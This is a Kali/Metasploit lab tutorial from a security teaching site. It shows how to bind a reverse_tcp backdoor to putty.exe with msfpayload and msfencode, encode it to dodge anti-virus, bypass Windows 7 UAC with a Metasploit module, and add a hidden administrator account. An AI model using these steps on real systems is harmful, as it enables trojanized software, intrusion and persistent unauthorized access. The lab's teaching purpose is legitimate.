(Metasploit:
Using msfpayload & msfencode)

{ Kali 1.0: msfencode Putty
with msfpayload on Windows 7 }

Section 0. Background
Information

What is the scenario?

Have you ever heard about how a malicious
perpetrator placed a virus or backdoor into a game or very common
internet utility? Unfortunately, it is very simple to do so.
The following lab demonstrates how to use msfpayload to create the
backdoor and msfencode to (1) bind the backdoor to Putty.exe (or a game) and to (2)
possibly evade anti-virus detection.

What is Metasploit?

The Metasploit Framework is a open source
penetration tool used for developing and executing exploit code against
a remote target machine it, Metasploit frame work has the world's
largest database of public, tested exploits. In simple words, Metasploit
can be used to test the Vulnerability of computer systems in order to
protect them and on the other hand it can also be used to break into
remote systems.

What is mfspayload?

msfpayload is a command line instance of Metasploit that is used to
generate and output all of the various types of shellcode that are
available in Metasploit. The most common use of this tool is for the
generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and
options before finalizing an Exploit Module.

What is msfencode?

msfencode is another great little tool in
the framework’s arsenal when it comes to exploit development. Most of
the time, one cannot simply use shellcode generated straight out of
msfpayload. It needs to be encoded to suit the target in order to
function properly. This can mean transforming your shellcode into pure
alphanumeric, getting rid of bad characters or encoding it for 64 bit
target.

What is putty?

PuTTY is a free and open-source terminal
emulator, serial console and network file transfer application. It
supports several network protocols, including SCP, SSH, Telnet, rlogin,
and raw socket connection. It can also connect to a serial port (since
version 0.59). The name "PuTTY" has no definitive meaning.

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered malicious and is against the law.

Command #1, Executables, like putty.exe,
must be copied to the templates directory in order to encode it with
msfencode.

Command #2, Create a reverse_tcp
payload backdoor using msfpayload to connect back to Kali (LHOST=192.168.121.158)
using port (LPORT=4444).
Use msfencode to bind the reverse_tcp payload backdoor to putty.exe.
Use 3 interations of shikata_ga_nai encoding to perhaps bypass an
Anti-Virus it one existed on the machine.

Command #3, Make bad_putty executable.

Command #4, List both the putty
executables.

Section 9: Start
msfconsole and listener

Start A Typescript

Instructions:

script msfconsole_putty.txt

Notes(FYI):

Command #1, Makes a typescript of
terminal session. It is
useful for students who need a hardcopy record of an interactive
session as proof of an assignment. Basically all input and
output will be stored in the file msfconsole_putty.txt.

Start msfconsole

Instructions:

msfconsole

Note(FYI):

Command #1, The msfconsole provides an
“all-in-one” centralized console and allows you efficient access to
virtually all of the options available in the MSF.

Command #1, The Net User is a
command-line tool that can help system administrators to view, add
or modify user accounts.

Display Username (student) Details

Instructions:

net users student

Note(FYI):

Command #1, Display the details of the
student user account. Notice that student is part of the
Administrators group.

Account Creation Attempt

Instructions:

net users jhacker abc123 /ADD /FULLNAME:"Johnny
Hacker"

View Access denied message.

exit

Note(FYI):

Command #1, try to create an account (jhacker)
with password (abc123) with the name of (Johnny Hacker).

Notice, that even though the student
user account belongs to the Administrator group, this account does
not the ability to create or modify accounts. The next steps
will show you how to escalate the Windows 7 User Access Control (UAC).

Command #3, exit the Command Prompt.

Section 12: Escalate
User Privilege

Viewing Sessions

Instructions:

background

sessions -l

"l"
as in lamb.

Note(FYI):

Command #1, Using the background command places the
current session into the background and brings us back to the
Metasploit console without terminating the session.

Command #2, sessions -l, allow a user to view all
the established meterpreter sessions.

Send UAC Bypass

Instructions:

use exploit/windows/local/bypassuac

show options

set SESSION
1

"1"
as in the number one.

exploit

Notice the stage being sent and
creation of a new meterpreter connection.

Note(FYI):

Command #1, This is a post-exploitation module that
Escalates the UAC (User Account Control) Protection Bypass.

Command #2, Show options. Notice
the SESSION variable needs to be set.

Command #2, The 'getsystem' command allows you to
escalate the current session to the SYSTEM account from an
administrator user account. This is why your general user account
should not have administrative privileges.

Command #3, Notice the username is now
SYSTEM, which has Administrator privileges.

Create User / Add to Administrators Group

Instructions:

shell

net users jhacker abc123 /ADD /FULLNAME:"YOUR
NAME"

Replace (YOUR
NAME) with your actual name.

net localgroup Administrators jhacker
/ADD

Note(FYI):

Command #1, From the Meterpreter
prompt, drop down into a Windows Terminal Console.

Command #2, Create a new user (jhacker),
set the password (abc123);
and Supply the FULLNAME(YOUR
NAME). Remember to use Your Name.

Command #3, Add new user (jhacker)
to the Administrators group.

View Administrators Group

Instructions:

net localgroup Administrators

Note(FYI):

Command #1, Display all users that
belong to the Administrators group. Notice that jhacker is now
a part of that group.

View User Details

Instructions:

net users jhacker

Note(FYI):

Command #1, Display the user (jhacker)
details. You should see your name on the "Full Name" line.
Also, jhacker should belong to the Administrators group.